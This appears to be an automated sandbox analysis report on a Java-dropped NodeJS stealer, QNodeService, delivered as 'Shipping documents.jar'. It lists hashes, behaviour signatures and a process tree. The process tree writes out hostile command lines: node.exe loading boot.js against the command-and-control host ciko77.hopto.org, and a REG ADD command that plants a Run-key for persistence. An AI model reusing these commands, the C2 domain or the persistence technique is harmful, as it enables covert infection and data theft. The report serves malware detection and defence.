Analysis
- max time kernel: 149s
- max time network: 152s
- platform: windows10_x64
- resource: win10
- submitted: 22-10-2020 06:28
Static task: static1

Behavioral task: behavioral1
- Sample: Shipping documents.jar
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: Shipping documents.jar
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Shipping documents.jar
- Size: 74KB
- MD5: aca734eeac3a00205e7a64800b05cb95
- SHA1: e09deace896a082517204f46ae3bddfc2f3f46c1
- SHA256: 726902ed1aab6fe2e7632d70bfba8fe89efc025bc76c7f63c8cbc2f73dea193e
- SHA512: 2966c44e70c9e0b2864112db107dd7194537ec71b654f173eff559a3ee4e03ecfd6ca5207a95a4cb3e8606197ab84fe12835d60c1e536a69370a103072f6f4c1
- Score: 10/10
Malware Config
Signatures

QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.

Executes dropped EXE (3 IoCs)
  pid | Process
  648 | node.exe
  1492 | node.exe
  3144 | node.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\01a5d575-b9d7-42ef-b3ec-78b85d3d11c8 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe

JavaScript code in executable (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x000100000001adaf-173.dat | js
  behavioral2/files/0x000100000001adaf-176.dat | js
  behavioral2/files/0x000100000001adaf-180.dat | js

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  17 | wtfismyip.com
  18 | wtfismyip.com

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid | Process
  648 | node.exe
  648 | node.exe
  648 | node.exe
  648 | node.exe
  1492 | node.exe
  1492 | node.exe
  1492 | node.exe
  1492 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe
  3144 | node.exe

Suspicious use of WriteProcessMemory (12 IoCs)
  description | pid | Process | procid_target
  PID 748 wrote to memory of 1772 | 748 | java.exe | 73
  PID 748 wrote to memory of 1772 | 748 | java.exe | 73
  PID 1772 wrote to memory of 648 | 1772 | javaw.exe | 77
  PID 1772 wrote to memory of 648 | 1772 | javaw.exe | 77
  PID 648 wrote to memory of 1492 | 648 | node.exe | 79
  PID 648 wrote to memory of 1492 | 648 | node.exe | 79
  PID 1492 wrote to memory of 3144 | 1492 | node.exe | 80
  PID 1492 wrote to memory of 3144 | 1492 | node.exe | 80
  PID 3144 wrote to memory of 2488 | 3144 | node.exe | 82
  PID 3144 wrote to memory of 2488 | 3144 | node.exe | 82
  PID 2488 wrote to memory of 2428 | 2488 | cmd.exe | 83
  PID 2488 wrote to memory of 2428 | 2488 | cmd.exe | 83
Processes

Depth 1: C:\ProgramData\Oracle\Java\javapath\java.exe
  Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Shipping documents.jar"
  PID: 748
  - Suspicious use of WriteProcessMemory

  Depth 2: C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\55636383.tmp
    PID: 1772
    - Suspicious use of WriteProcessMemory

    Depth 3: C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ciko77.hopto.org
      PID: 648
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

      Depth 4: C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_uarFpu\boot.js --hub-domain ciko77.hopto.org
        PID: 1492
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

        Depth 5: C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_uarFpu\boot.js --hub-domain ciko77.hopto.org
          PID: 3144
          - Executes dropped EXE
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

          Depth 6: C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "01a5d575-b9d7-42ef-b3ec-78b85d3d11c8" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            PID: 2488
            - Suspicious use of WriteProcessMemory

            Depth 7: C:\Windows\system32\reg.exe
              Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "01a5d575-b9d7-42ef-b3ec-78b85d3d11c8" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              PID: 2428
              - Adds Run key to start application